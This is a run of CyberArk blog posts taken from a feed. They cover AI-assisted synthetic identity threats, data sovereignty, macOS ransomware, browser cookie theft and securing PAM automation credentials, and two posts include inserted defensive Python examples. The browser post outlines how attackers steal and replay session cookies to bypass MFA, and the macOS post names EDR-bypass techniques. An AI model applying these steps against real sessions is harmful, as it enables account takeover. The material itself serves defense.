Simple data extraction is just the tip of the AI iceberg, as it were. Attackers, of course, won’t (and don’t) limit themselves to what’s available. Our digital lives make it easy for the likes of advertisers and social media platforms to build composites of people’s identities based on their online behaviors and preferences. These digital dossiers are routinely sold and shared – and can also be intercepted.

This is how the potential for next-level, primo opportunities arise for attackers. Just think of the imitation opportunities alone. The creation of a synthetic identity can fuel spoofing, phishing and impersonation, by aiding attackers in producing more realistic human speech and text patterns and, in turn, convince someone to share or do something they shouldn’t. Once that’s been obtained, cyber extortion can enter the fray. The more personal data attackers can harvest, the more successful they are likely to be – and the more they will try to take.

“Think about the information that could be accessed with the data collected by the big tech miners,” Noe says. And, of course, as practitioners of “assume breach,” we must think about it. Data science, he says, requires thinking outside the box, problem-solving and analytical thinking. Attackers take a similar approach.

Noe adds, “Everything is asking our physical identities to attach more and more digital services to our digital identities. Every time we add a new app to our mobile devices another piece of software is asking for permissions to reach deeper into our private lives. Our individual attack surface is literally everywhere.”

Everything Ties Back to Identity

Noe acknowledges the potential for this new type of synthetic identity threat is yet to be fully realized. But as a cybersecurity practitioner whose job requires him to put himself in an attacker’s shoes, he’s constantly considering potential threats and ramifications. And they almost all inevitably involve data and identity.

Putting it into context, Noe says, “We hear about identity theft, identity monitoring, identity validation and identity security. Everything’s tied to identity and with good reason. Our identities are the most valuable thing we possess – it’s our likeness, our voice, behavior patterns. It’s our friends, family, hobbies, likes and dislikes. It’s what makes us.”

Your individual identity is an amalgamation of your physical and digital self, he contends. By this reasoning, your identity could potentially be put at risk through not just online interactions, but also how you interact in the physical world – like with your intelligent refrigerator or how you connect to home Wi-Fi, to point to just a couple of seemingly hundreds-to-zillions of other linked actions. We’re at the point where there is no separating these two sides of self – they are inextricably merged.

Who is Len Noe? Identity as a Guiding Principle

Let’s acknowledge again that Len Noe is transhuman by way of implanted chips and devices. Not that there’s any such thing as an ordinary human identity – we all have our own singular defining features and characteristics. But the tangled irony of focusing on the subject of identity with Noe is that his own identity is inherently complex. As we’ve chronicled here on the CyberArk blog and on our podcast in the past, Noe’s implants are for the sake of attacker-like experimentation – he doesn’t just think like an attacker, he’s altered his actual physical being in an ongoing effort to stay ahead of them. But you wouldn’t know it to look at it.

I’m standing with Noe as we await entrance to the Boston House of Blues for a company party capping Day Two of CyberArk’s IMPACT23 conference. It’s a mild early evening in May, amid a protracted New England spring that seemingly wants to Benjamin Button its way toward winter. Noe’s wearing short sleeves, revealing tattooed sleeves on both arms. We’ve spoken in the past about the various microchips and other implanted devices (with varying functionality) he has beneath his skin, but this is the first time I’m experiencing them, as he pinches his skin so I can see a couple of them silhouetted beneath the surface.

To get into the House of Blues, Noe flashes a standard-issue ID and an event-only wristband, just like all the standard-issue human attendees.

The Work-Life and Home-Life Identity Overlap

Work happens everywhere, anywhere. This means that, among other things, lines separating “work” devices and online identifiers from “personal” ones are blurred or have completely vanished. And attackers know this.

“As an attacker, why would I go after your corporate asset that I know has multiple layers of security controls on it, when I know you’re conducting business activities on an unprotected personal device?” says Noe. “It’s much easier for me to just target your own computer – then I can just ride the applications in the private tunnels back to the enterprise.”

Company-owned devices also present risks. “What’s the first thing that’s going to happen when a work laptop walks out of a corporate environment? It’s going to be connected to a home WiFi network,” Noe says. “Once these things leave the corporate environment, they’re out in the wild and it’s up to security professionals to keep security in the front of users’ minds so they remain vigilant, realizing everything out there is trying to get in and that they play an important role in keeping them out.”

Synthetic identity could come into play in a variety of ways within this context. For instance, a synthetic identity could be used to subvert a corporate network by way of the home network using data correlated through AI. Or, that synthetic identity could spoof individuals to cough up passwords for personal accounts that might be similar to (or exactly the same as) those used for corporate applications. Like, let’s say you were successfully phished and shared your Netflix password, which happens to be the same password you use for your enterprise Office 365 account.1 Game over. Although, of course, it’s not a game.

Stop Spreading Digital Breadcrumbs – Secure Your Digital Identity

So, what can individuals and organizations do to stem the threats posed by AI and ML-assisted synthetic identities? Noe suggests the following:

4 ways to protect your digital identity:

  • Curb information sharing online. Does X Brand really need the information they’re asking for? Is that social media quiz prompting you for identifying information that could be used to guess a password?
  • Download with caution and limit app access. Be aware of what permissions an app requests before downloading. Does it really need access to things like your camera, microphone and contact list?
  • Secure your home network. Use a strong, complex password for your router and change it regularly. Always keep firmware and software patches up to date.
  • Get away from direct log-in. For personal online use, always enable multi-factor authentication (MFA). For work, enterprise-grade protection should be single sign-on (SSO) with adaptive MFA on the front end.

Noe stresses that for MFA, “The best option we have is a true adaptive multifactor to validate that I am the person that I say I am. Multifactor does not mean two-factor – two is a minimum. And from an enterprise perspective we need to start looking deeply into the crossover between personal and business.”

With individual identities comprised of countless digital data points that are ultimately tied to physical beings, everything is more connected than it’s ever been. And now there’s widely available technology to connect the dots at scale. In a time considered to be an AI gold rush, while the technology itself is still at a relatively early stage, securing our identities, at work and home – everywhere – is paramount.

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

For more from Len Noe on synthetic identity, check out his recent Trust Issues podcast conversation.

1 You know not to repeat passwords, so please don’t do it. Check out this blog post for an eye-opener on password protection.

]]>
Data Sovereignty: Balancing Residency Requirements and Access Rights https://www.cyberark.com/blog/data-sovereignty-balancing-residency-requirements-and-access-rights/ Fri, 30 Jun 2023 15:45:12 +0000 https://www.cyberark.com/?p=179869 International flags to depict data sovereignty focus of the accompanying blog post.

Global organizations – and the data they collect and use on a daily basis – exist today both within and beyond the traditional physical boundaries of countries. They may have cloud infrastructure that spans the world, but local laws and regulations can still have a big impact on how data needs to be stored and accessed, even if it’s in the cloud.

Data sovereignty is the idea that organizations need to consider the local laws in the region or country in which data is collected. While data sovereignty has grown in importance thanks to regulations like the General Data Protection Regulation (GDPR), companies have had to make considerations regarding data storage and usage well before that. The issue, however, has grown more complex in recent years with increasing regulation and other compliance events like sanctions, as well as macro trends like the continued move to the cloud.

Companies not only have to think about where their data is being stored. They also need an easy way to manage access to data on a region-specific basis and quickly pull audit logs to show compliance with various local regulations and laws.

A More Connected World … and a More Disparate One

Things used to be simpler in an on-premises-only world. Sure, you might have multiple operations in different countries. But for each new operation, you would set up new on-premises infrastructure, and your data would be siloed in that on-premises location in the country you were operating in.

But with modernization efforts and the move to cloud-native SaaS solutions, things have grown more complex for organizations. You might have enterprise-wide environments and infrastructure where data, including keys and other important credentials, are stored. Now you have to work with your SaaS vendors and cloud providers to determine what data you’re storing, where you’re storing it and who has access to those keys and credentials.

Additionally, as I mentioned above, there are now strict data protection regulations that must be complied with. GDPR is the biggest one, requiring any organizations operating in the European Union (EU) to follow specific rules when processing the personal data of EU residents. Adopted in 2016, GDPR became the inspiration for several other related regulations in other countries and states, such as the California Consumer Privacy Act (CCPA). As more countries introduce their own flavors of data privacy regulations, it becomes more challenging for organizations to ensure they are in compliance with each local law across their operations.

Beyond that, geopolitical turmoil has also brought data sovereignty to the forefront of organizations’ priority lists as new sanctions require them to quickly stop doing business and processing data in a country where they may have formerly had operations or customers. While that may have once been as simple as a bank closing its regional branch and locking the doors, that bank now has to think about all of the customers in that region who have access to their banking app, as well as all the employees who have access to company resources. How do you quickly revoke access if you need to and prove that you’re no longer operating in sanctioned areas?

Data sovereignty is critical to consider particularly if your organization is:

  • Expanding into a new country or region.
  • Merging with or acquiring a company that operates in a new country or region.
  • Undergoing digital transformation efforts moving you from on-premises infrastructure into the cloud (or multiple clouds).
  • Impacted by geopolitical sanctions that require you to stop doing business in a certain country or region.

Granular Access Policies

The challenge many organizations operating in multiple countries face is that they need to balance these data sovereignty requirements with the nature of their modern businesses, in which they’re often using centralized SaaS solutions for tasks like storing secrets, credentials and keys. These centralized solutions help increase operational efficiency for security teams, but organizations still have to ensure they are meeting the requirements of data sovereignty regulations.

Let’s take a look at an example. You’re a company that operates across Europe, including France and Germany. You use a centralized vault to secure your secrets (keys, credentials and more), and you have human users and machine identities that need to access the data in country-specific infrastructure using those secrets. But you need to ensure that France’s keys (and the data they can access) aren’t being granted to accounts in Germany, or vice versa, to remain in compliance with data sovereignty regulations.

Since you’re already using a modern approach for centralized secrets management and non-human access, consider granular access control of your secrets. Similar to role-based access control (RBAC), with these types of controls, you can set up location-based access policies that ensure that those who need access to the data (and only those who need access, based on that region’s laws and regulations) have access. That way you can satisfy compliance requirements while still enjoying the efficiency benefits of using a centralized solution that grants you visibility of your secrets across all of your environments.
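To make the France/Germany case concrete, here is an added example (not CyberArk's code or a product API) of a small policy evaluator for a centralized vault: each secret carries a residency tag, each policy is pinned to a region, a sanctioned region can be cut off in one step, and every attempt is written to an audit log that can be pulled per country. The secret paths and values, identities and policies are constructed sample data.

```python
from dataclasses import dataclass
from datetime import datetime, timezone

@dataclass(frozen=True)
class Identity:
    name: str
    region: str         # where the human or machine identity operates from
    roles: frozenset


@dataclass(frozen=True)
class Secret:
    path: str
    residency: str      # country whose law governs the data this secret unlocks
    value: str


@dataclass(frozen=True)
class Policy:
    """RBAC-style rule pinned to a region: role in region may read path_prefix."""
    role: str
    region: str
    path_prefix: str


class RegionScopedVault:
    def __init__(self, secrets, policies):
        self._secrets = {s.path: s for s in secrets}
        self._policies = list(policies)
        self._sanctioned = set()   # regions whose identities have been cut off
        self.audit_log = []        # every attempt, allowed or denied

    def sanction_region(self, region):
        """Revoke every identity operating from `region` in one step."""
        self._sanctioned.add(region)

    def _decide(self, identity, secret):
        if identity.region in self._sanctioned:
            return False, "identity region under sanctions"
        # Residency is checked before any policy, so a mis-scoped policy
        # still cannot hand France's keys to an account in Germany.
        if identity.region != secret.residency:
            return False, f"region {identity.region} != residency {secret.residency}"
        for p in self._policies:
            if (p.role in identity.roles and p.region == identity.region
                    and secret.path.startswith(p.path_prefix)):
                return True, f"policy {p.role}@{p.region}:{p.path_prefix}"
        return False, "no matching policy"

    def fetch(self, identity, path):
        secret = self._secrets.get(path)
        if secret is None:
            allowed, reason, residency = False, "no such secret", None
        else:
            allowed, reason = self._decide(identity, secret)
            residency = secret.residency
        self.audit_log.append({
            "time": datetime.now(timezone.utc).isoformat(),
            "identity": identity.name, "identity_region": identity.region,
            "secret": path, "residency": residency,
            "allowed": allowed, "reason": reason,
        })
        if not allowed:
            raise PermissionError(f"{identity.name} -> {path}: {reason}")
        return secret.value

    def audit_for_residency(self, residency):
        """The entries a regulator for one country would ask to see."""
        return [e for e in self.audit_log if e["residency"] == residency]


# Constructed sample data: one vault serving French and German production.
SECRETS = [
    Secret("fr/prod/db-password", "FR", "placeholder-fr-secret"),
    Secret("de/prod/db-password", "DE", "placeholder-de-secret"),
]
POLICIES = [Policy("db-admin", "FR", "fr/"), Policy("deployer", "DE", "de/")]
ALICE = Identity("alice@example.fr", "FR", frozenset({"db-admin"}))
CI_DE = Identity("ci-runner-de", "DE", frozenset({"deployer"}))


def run_scenario():
    """France/Germany case plus a later sanction; returns each request's result."""
    vault = RegionScopedVault(SECRETS, POLICIES)
    outcome = {}

    def attempt(label, identity, path):
        try:
            outcome[label] = vault.fetch(identity, path)
        except PermissionError as exc:
            outcome[label] = str(exc)

    attempt("alice_fr", ALICE, "fr/prod/db-password")     # allowed by policy
    attempt("alice_de", ALICE, "de/prod/db-password")     # denied: residency
    attempt("ci_de", CI_DE, "de/prod/db-password")        # allowed by policy
    vault.sanction_region("DE")
    attempt("ci_de_after", CI_DE, "de/prod/db-password")  # denied: sanctions
    outcome["de_audit"] = vault.audit_for_residency("DE")
    return outcome
```

Calling `run_scenario()` shows the French admin reading only French secrets, the German CI runner losing access the moment its region is sanctioned, and a per-country audit slice that records the denials as well as the grants.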

Kurt Sand is general manager of DevSecOps at CyberArk.

]]>
macOS Least Privilege Best Practices to Combat Rising Ransomware https://www.cyberark.com/blog/macos-least-privilege-best-practices-to-combat-rising-ransomware/ Tue, 27 Jun 2023 19:36:41 +0000 https://www.cyberark.com/?p=145694 macOS Least Privilege Best Practices

Ransomware accounts for one in every four breaches, and increasingly, it’s going after enterprise macOS users.

macOS Ransomware Attacks are Mounting

Historically, it didn’t make much financial sense for attackers to create Mac-specific malware since most company machines ran on Windows or Linux, but that’s changing. Macs now make up about a quarter of enterprise endpoints and malware as a service is readily available for every operating system. In the workforce, Mac users are often power users such as developers or executives who have admin rights and can access sensitive data and systems. This makes them highly attractive targets for criminal organizations seeking out the most impactful users – and necessitates robust endpoint privilege security controls.

Recent reports suggest that opportunistic attackers are paying closer attention to macOS – from new information stealers that grab passwords and extract data from web browsers and cryptocurrency wallets to the first-ever Mac ransomware samples linked to the notorious LockBit gang.

5 Reasons EDR/XDR Alone Can’t Block Mac Attacks

Since most cyberattacks originate at the endpoint, many security teams rely on endpoint detection and response (EDR) or extended detection and response (XDR) tools to protect against macOS ransomware and other cybersecurity threats. Unfortunately, adversaries count on this, which is why organizations still suffer costly and damaging endpoint attacks despite hefty endpoint security investments.

Here are five reasons why conventional endpoint security tools aren’t enough to stop macOS attacks:

  1. Many macOS attacks involve administrative privileges. Attackers routinely look for ways to exploit privileged accounts to deploy ransomware and achieve their goals. While EDR tools play an important defense-in-depth role, they aren’t designed with privileged attackers in mind.
  2. EDR solutions focus on known threats. EDR tools suss out threats by monitoring and analyzing various endpoint activities (i.e., processes, registry settings, file operations, network traffic) for red flags. They typically use signature-based detection methods to do this (looking at file signatures, threat-class signatures, string signatures and/or behavior signatures). But this type of detection doesn’t recognize unknown malware variants or zero-day exploits, and it takes time for EDR vendors to roll out updates addressing newly discovered attacks. This can create security gaps since attackers constantly change up their tactics.
  3. Attackers can bypass EDR/XDR tools. For instance, MITRE ATT&CK T1070 and T1562 and other adversarial techniques involving privileged accounts are often used to circumvent popular endpoint security products. And since most EDRs hook into Gatekeeper, Apple’s native software inspection technology, attackers have also devised a variety of methods to circumvent the tool’s security checks to execute ransomware and other malicious content.
  4. Speaking of bypassing security checks, EDR solutions also can’t stop attackers from skirting or tampering with other endpoint security tools in place. A recently identified strain of macOS malware dubbed “Rustbucket” shows why this matters. Rustbucket sneakily circulates via a legitimate PDF viewer app. Since it’s an unknown strain, EDR tools are unlikely to flag it as malicious, and since it only tries to infect the target device after it runs the correct PDF file, antivirus probably won’t detect it either.
  5. Processing the massive volume of security events generated on endpoints – then creating (and continuously evolving) policies that follow security best practices – can be very challenging and time consuming, especially for large organizations with diverse environments.

How Least Privilege Control Reduces the macOS Attack Surface

Reactively analyzing complex data sets for known attack patterns isn’t an effective (or sustainable) macOS protection strategy. Instead, the focus should be on establishing fundamental identity security controls to proactively defend against privileged attacks of all kinds – known and unknown. This comes down to least privilege.

endpoint attack vector

Least Privilege to Eliminate Standing Local Admin Rights

No user should have local admin rights. But as any security professional knows, removing them all is a gargantuan task. It’s also a move that’s sure to frustrate Mac users and complicate IT operations. This is where AI-powered policy creation and consistent least privilege control are key for achieving balance – by automatically removing local admin rights, contextually authenticating identities and dynamically authorizing temporary, on-demand privilege elevation instead. Some applications require the user to be a local admin or have a local admin account. In these instances, admin rights can be granted just in time, then taken away as soon as the task is complete.

Least Privilege for Smarter Application Control

Mac users often need flexibility to download and use applications from the internet. But this creates risk. How do you protect the environment from an application that could be malicious or could attempt to download other apps that are undesirable? Here, conditional policy-based application control helps security teams create scenarios for every user group, from DevOps to HR, while defending against unknown malware variants without impairing legitimate applications. If a Mac power user needs to utilize an unfamiliar app, they can do so in a secure, sandboxed environment while access to the internet and/or intranet, network file shares and other processes’ memory is blocked.

Least Privilege to Block Credential Theft

Credential theft remains security professionals’ No. 1 risk area and the root cause of most breaches. By stealing credentials and compromising identities, attackers can move deeper into an environment and closer to their goals. Defending credentials is a critical piece of the endpoint security puzzle. By instituting granular, policy-based least privilege controls, organizations can effectively safeguard credentials cached by macOS and other operating systems, password managers, web browsers, SSO solutions and other applications.

Least Privilege to Stop Ransomware at the Start

A strong mix of endpoint privilege security, privilege threat protection and application control can block ransomware actors before they can even get started. If an attacker does slip through the cracks, these controls will greatly complicate their mission by preventing additional credential compromise, privilege escalation, lateral movement and code execution, while hindering data encryption and exfiltration by ensuring that only approved content handlers can access files.

Trusted entities including the U.S. Cybersecurity and Infrastructure Security Agency (CISA) promote best practices including local admin rights removal, role-specific least privilege enforcement and credential theft protection across all enterprise endpoints – from workstations to servers, to physical and virtual infrastructures on premises and in the cloud. As ransomware and other threats continue to rise, foundational endpoint security controls are a must no matter what operating systems are in play.

To learn how CyberArk Endpoint Privilege Manager can help your organization improve macOS protection and proactively block ransomware and other cyber incidents, read our whitepaper “Tackle EDR Gaps Against Cyberattacks with Endpoint Privilege Security.”

Francis Yom is a regional least privilege specialist at CyberArk.

]]>
Securing the Web Browser in an Identity-focused Threat Landscape https://www.cyberark.com/blog/securing-the-web-browser-in-an-identity-focused-threat-landscape/ Fri, 23 Jun 2023 13:10:39 +0000 https://www.cyberark.com/?p=145655 Dark web browser close-up on screen

For more than 30 years, we’ve been living in a world where one of the most widely-used applications is the web browser. Despite being designed primarily for consumer use, browsers have become essential to how enterprises operate – serving as the connective tissue between identities, applications and data. And yet, despite all of the advancements leading to today’s digital and cloud-centric world, one of the least secure applications is … the browser.

In this post, we’ll discuss why browsers are highly vulnerable to attacks, how today’s threat actors are exploiting them and what IT security teams can do about it.

Why Is the Browser So Unsafe? Start With Identities and What They Can Access

In today’s threat landscape, the nature of privilege is evolving. It’s no longer just IT admins who require protection based on their access to sensitive resources. Now any user within an organization can become privileged, gaining access to highly sensitive information like customer data, financial records and intellectual property – in many cases, more access than they actually need.

And one of the most common ways employees gain this type of access is through their browsers, where they access web-based applications, virtual collaboration tools and shared drives where documents can be accessed, downloaded and changed – among other gateways to organizations’ highest-value data.

All of this activity has been accelerating in recent years, as the way people work – and the various places and devices they work from – continue to evolve. According to a recent CyberArk survey, virtually all (99%) of IT security decision-makers agree they’ll face an identity-related compromise in the year ahead. Among the 2,300 respondents surveyed, the top three cited reasons are:

  • Digital transformation (58%).
  • Hybrid working practices (44%).
  • Third-party usage (44%).

It’s no coincidence these variables rise to the top. They represent an ecosystem of users – internal and external – who contribute virtually to help drive key initiatives, from cloud migrations to new digital products. Each contributor is tied to multiple digital identities used to authenticate and access what they need. And that’s where the risk factor lies. These identities – along with their information, poorly-protected credentials and access permissions – can be compromised through users’ web browsers.

Next-level Risk: How Attackers Can Easily Infiltrate Browser Sessions

To this point, we’ve covered risks around the people (and, in turn, identities) using unsecured browsers across your organization. But what are the specific risks tied to the browser technologies themselves? For starters, some risks are well-known in IT security circles:

  • Browsers enable users to install unverified extensions that can secretly upload data to attacker-controlled servers.
  • They provide insider users with built-in tools to circumvent preventative controls.
  • They allow users to store passwords to all of their applications – work-related and personal – in browser-based tools designed for convenience over protection.

But let’s dig deeper into the risks from an attacker’s point of view.

One of the most dangerous and prominent browser-centric attack methods involves cookies – specifically, attacks centered on stealing, forging, altering or manipulating cookies from users’ web sessions to gain unauthorized access to sensitive resources. The CyberArk Red Team has seen a significant increase in this post-authentication attack vector in which the threat actor:

  1. Acts as an imposter, hijacking the cookie after it has been authenticated.
  2. Replays the cookie in the session so they can bypass multi-factor authentication with a very low detection rate.
  3. Hijacks the in-progress session with an aim toward stealing data, moving laterally and escalating privilege and disrupting operations through malware.

In a way, browser session cookies are constantly defying Zero Trust principles, existing as an automatic bypass from continuous verification. After a user’s initial authentication, the website or web-based application they’re using establishes a cookie that allows repeat visits, without requiring reauthentication. It’s like the unspoken agreements we might have with a front desk attendant after checking into a building once. Want to come back inside again and again? All you need is a quick nod and a “you’re all set” from the attendant, who’s more interested in checking their phone than verifying you’re the same person from earlier.

Even without admin privileges, attackers can hijack cookies once they’ve compromised a user’s device. And once those cookies fall into an attacker’s hands, they become the privileged access gift that keeps on giving – because cookies are saved not only within users’ identities but their specific privileges too. Meanwhile, end users’ tendency to use their work devices for personal use – calling back to our point about how work is evolving – compounds the risk. This practice can potentially enable attackers to gain access to both personal and enterprise data.

And if attackers aren’t using the cookies themselves, they’re buying and selling them on the dark web. Threat actors don’t need to be sophisticated enough to compromise an endpoint to broker access in – they can just buy a cookie and move on to tactics such as phishing, password compromise and all-out attacks.

How to Defend Against Cookie Theft and Session Hijacking

As part of a unified identity security approach, organizations can reduce risk by implementing enterprise-wide, cookieless browsing.

You might wonder if that’s even possible. After all, cookies seem ubiquitous and inevitable. How many times have you been greeted by that beloved “Do you accept all cookies?” prompt today alone? It’s less of a question and more of a begrudged reality.

In short, yes, it’s possible. With cookieless browsing, the cookies are stored on a secure server to allow for seamless use by individuals who are still able to navigate without their cookies being available for theft. This also allows organizations to lock down data and enable security at the user level to protect the most sensitive information. Cookieless browsing enables users to access and use web-based resources in a more secure way, making it virtually impossible for hackers or third parties to steal, hijack and do damage. And with respect to privacy, we can ensure that users’ web sessions, data and accounts remain confidential and secure.
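
The replay sequence in the numbered list above (hijack an authenticated cookie, replay it, ride the session) is easiest to see with a server-side session table. The following is an added example, not code from the post and not CyberArk's enterprise browser implementation; it shows a complementary control to the cookieless approach described here: the cookie is only an opaque handle, the session is bound to the client context it was issued to, a replay from a different context is revoked and alerted on, and a long-lived session is forced back through step-up authentication instead of acting as a standing bypass. The user agent strings, IP addresses and timings are constructed, and the coarse context fingerprint (user agent plus source IP) is an assumption made for the example.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Per-process key for the context fingerprint. Constructed for the example;
# a deployment would load it from its secrets store, not generate it at start.
SERVER_KEY = secrets.token_bytes(32)


def context_fingerprint(user_agent: str, client_ip: str) -> str:
    """Keyed hash of the client context a session was issued to.
    Coarse on purpose (assumption: UA string plus source IP); the point is
    that a cookie copied to another machine does not carry this context."""
    material = f"{user_agent}|{client_ip}".encode()
    return hmac.new(SERVER_KEY, material, hashlib.sha256).hexdigest()


@dataclass
class Session:
    user: str
    bound_fp: str          # fingerprint at issue time
    last_verified: float   # last time the user proved identity (login or step-up)


class SessionStore:
    """Server-side session table: the cookie value is only an opaque handle."""

    def __init__(self, reverify_after: float = 900.0):
        self.reverify_after = reverify_after   # seconds before step-up is required
        self.sessions: Dict[str, Session] = {}
        self.alerts: List[str] = []            # would feed a SIEM in a deployment

    def issue(self, user: str, user_agent: str, client_ip: str, now: float) -> str:
        token = secrets.token_urlsafe(32)
        self.sessions[token] = Session(user, context_fingerprint(user_agent, client_ip), now)
        return token

    def validate(self, token: str, user_agent: str, client_ip: str,
                 now: float) -> Tuple[str, Optional[str]]:
        """Returns (status, user); status is 'ok', 'reverify' or 'denied'."""
        session = self.sessions.get(token)
        if session is None:
            return ("denied", None)
        if context_fingerprint(user_agent, client_ip) != session.bound_fp:
            # Same cookie, different device or network: treat as a replay.
            # Revoke rather than let the copied cookie ride the session.
            self.alerts.append(f"cookie replay suspected for user {session.user}")
            del self.sessions[token]
            return ("denied", None)
        if now - session.last_verified > self.reverify_after:
            # The cookie is not a standing bypass: require MFA again.
            return ("reverify", session.user)
        return ("ok", session.user)

    def mark_reverified(self, token: str, now: float) -> None:
        """Call after the user completes step-up authentication."""
        self.sessions[token].last_verified = now
```

Revoking on fingerprint mismatch is deliberately strict: a legitimate user who changes network will have to log in again, which is the trade-off a defender accepts in exchange for a replayed cookie failing on first use and producing an alert rather than silently bypassing MFA.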

Looking beyond cookies, it’s essential to take a big-picture view of what needs protecting in the browser environment. This includes having the controls and capabilities in place to secure access to business-developed web apps, cloud management consoles and SaaS-based tools and services with controls tailored to each user. And the best approach embodies key identity security principles. This includes ensuring the browser itself has native integration with key defense-in-depth solutions for enabling seamless and secure access while infusing intelligent privilege controls to an organization’s wide array of browser users (aka employees).

A few examples of identity security capabilities that can work together to secure browsers, but certainly not all, include: single sign-on (SSO), adaptive multi-factor authentication (MFA), enterprise-grade password protection, web session monitoring and controls for securing vulnerable endpoints.

Bringing It All Together: What It Takes to Secure Browsers

While somehow the web browser has existed for 30 years without a serious level of protection, we can change that now. Above all, it takes new thinking on how to build and continuously protect browsers, the identities using them and all the sensitive resources these widely used applications enable access to. We believe the modern browser can and should be built to balance protection and productivity. And this is possible through an integrated identity security approach and platform.

Check out this recap of the conference, where our leaders and industry experts shared their vision on how to secure web browsers – and where CyberArk announced a new innovation: the first identity security-based enterprise browser.

John Natale is a senior content marketing manager at CyberArk. 

]]>
PAM Automation Scripts: Don’t Forget to Secure Admin Credentials https://www.cyberark.com/blog/pam-automation-scripts-dont-forget-to-secure-admin-credentials/ Fri, 16 Jun 2023 15:15:45 +0000 https://www.cyberark.com/?p=145561 Securing PAM Automation

While IT executives understand the essential role privileged access management (PAM) solutions play in their organization’s overall security strategy, they’ve also continued to ask their PAM administrators to do more with less resources. To meet these additional asks, PAM admins have automated routine PAM tasks using scripts. PAM automation scripts can significantly lessen the burden on PAM admins and enable organizations to scale PAM usage across their entire enterprise. But securing PAM automation scripts and the admin credentials they hold is paramount.

After all, a hard-coded credential in a PowerShell script gave cyberattackers the foothold they needed to access Uber’s PAM solution and elevate their privileges to devastating effect in the 2022 breach. While automation scripts are often simple, they can hold the keys to other high-value resources within the company – including root credentials, cloud access keys and every credential in between from infrastructure orchestrators, admin credentials, service accounts and other configuration management tools. If those keys aren’t secured, attackers can easily use the unsecured credential in these scripts to find a way into an organization’s most sensitive areas.

Why Are PAM Automation Scripts So Powerful?

A PAM admin’s daily responsibilities typically revolve around the lifecycles of privileged users in their organization and require high levels of privilege. For example, when a privileged user joins the organization, the PAM admin has to add them to the right safes and grant them the necessary permissions they need to perform their privileged tasks. If a user leaves an organization, all that access has to be revoked to ensure the organization remains secure.

These processes typically involve multiple steps, all of which take time for the admin. Consider just one example of a new employee joining the organization. Of course, there are various approaches, but in this example, the PAM admin must:

  • Map that employee to an Active Directory (AD) group, giving them access to the software tools that they need for their job.
  • Map the employee to a group that grants them the right level of access to all of the safes that have the credentials necessary to work in those software tools. (Another approach is to map the employee to each individual safe they need access to, but you can see how that could quickly get overwhelming.)

This gets even more complex when you consider named accounts. For a named account, a personal safe is created for that new employee. Then the admin has to assign the proper permissions and add that new employee’s account to that personal safe, then put proper rotation policies around that.

And this is just the basics. As organizations scale, their PAM usage grows with them. They may have to onboard or offboard a large number of users at one time, particularly in the following situations:

  • Mergers and acquisitions, when employees are added by the hundreds (and sometimes thousands).
  • Large joiner/leaver events, including large-scale layoffs, which create a significant overhead from a compliance perspective.
  • Implementation of a PAM solution, including expanding users from just domain and local admins to groups like networking and cloud.

Admins need very high levels of privilege to complete these tasks. But do admins really want to do these repetitive tasks manually? And what’s the potential for errors with all of these manual steps? At some point, the growth reaches a point where automation isn’t just a nice-to-have – it’s essential for security teams who don’t have the resources to dedicate to all the mundane, day-to-day tasks required. You especially need this type of efficiency as you move beyond securing the human element and bring in all the machine identities that need to be secured – including virtual machines (VMs), service accounts in the cloud and robotic process automation (RPA) bots.

Security Risks for PAM Automation

Automation helps remove the risk of human error and saves PAM admins both time and budget that they can spend on other tasks. But while these scripts themselves may be small and simple, performing only minor tasks, they can expose critical systems to attackers. Hard-coded credentials in scripts can easily be stolen by attackers who gain access to the scripts (i.e., through a compromised network share, as happened in the Uber breach) and leveraged elsewhere. Scripts can also be easily copied, replicated and shared, with any hard-coded credentials shared along with them. Additionally, someone could potentially post a copy to a repository, exposing those credentials.

The danger increases as many of these scripts have high levels of privileged access and can thus cause a large amount of damage if unsecured credentials fall into attackers’ hands.

Best Practices for Securing PAM Automation

Here are some steps you can take to ensure that your PAM automation processes are secure:

  • Secure credentials used in scripts. No matter how inconsequential a script might seem, the value to the attacker is in the power of the embedded privileged credential(s). The script can be used as a jumping-off point for attackers if the right credential is embedded inside. Ensure that the credentials used in your automation scripts are vaulted and delivered at the time they are needed, not hard coded into the script.
  • Regularly rotate credentials. Establish policies to regularly rotate credentials. That way, even if there are hard-coded credentials in automation scripts, they quickly become invalid.
  • Automate credential management. Reduce the risk of human error by moving to an automated, on-demand process. Instead of having to manually manage credentials and add/remove users, you can have event-driven activities that are tied to your joiner/mover/leaver processes, including automated requests for approval.
  • Gain visibility. Ensure that you have oversight into what these automation scripts are doing – what resources they have access to, when they’re accessing and what they’re doing once they access the PAM solution. This is especially important for automation scripts that perform highly privileged activities like creating a new safe. Knowing exactly what these scripts are doing across your organization (and who is running them) can help you flag any risky activity and revoke access if needed.
  • Enforce least privilege. Don’t let these scripts have more access than they need. Follow the principle of least privilege so that these scripts have only the necessary privileges to perform their tasks, nothing more.
  • Practice defense in depth. Use the principles of Zero Trust and enact multiple layers of defense. Something like forced human approval with multi-factor authentication (MFA) can provide another hurdle for attackers who may have gained access to one of your automation scripts.

Identity Security for Automation

Naturally, PAM admins spend most of their time working within PAM solutions. Yet they don’t work in a vacuum, and as user workflows (as well as their own) become increasingly automated, PAM admins need additional functions and features to do their jobs. But if more tools mean more work, it defeats automation’s whole purpose.

This is just one reason why organizations are working to consolidate their identity security tools, bringing lifecycle management, identity automation and orchestration and centralized secrets management together in one comprehensive platform.

With this approach, PAM admins can access a host of built-in features that enable a trifecta of secure, automated and simplified functions – from automatically managing the credential lifecycle with REST APIs, to rotating privileged admin credentials used in scripts, to onboarding users.

Seamless integration with other tools across the organization’s broader security stack helps teams make smarter, faster decisions. For instance, when a third-party tool detects an event of a specific level of severity, it can automatically trigger the identity security platform to take specific corrective action.

But above all else, please ensure that the credentials used in your organization’s PAM automation scripts are secured. After all, they contain the privileged credentials used to assign privileged access to other users and are thus an attacker’s dream.

Learn more about how CyberArk Conjur Cloud and CyberArk Identity Flows help you automate PAM functions and secure the PAM admin credentials used by automation scripts.

Jed Knopf is a CyberArk Solutions Architect, as well as a former PAM admin. Sharon Abarbanel is a Manager, Product Management, CyberArk Secrets Manager.

]]>
Top Six Identity Security Risks Compounding Cyber Debt and Expanding the Attack Surface https://www.cyberark.com/blog/top-six-identity-security-risks-compounding-cyber-debt-and-expanding-the-attack-surface/ Tue, 13 Jun 2023 12:31:05 +0000 https://www.cyberark.com/?p=145374 Laptop screen displaying cover of the CyberArk 2023 Identity Security Threat Landscape Report

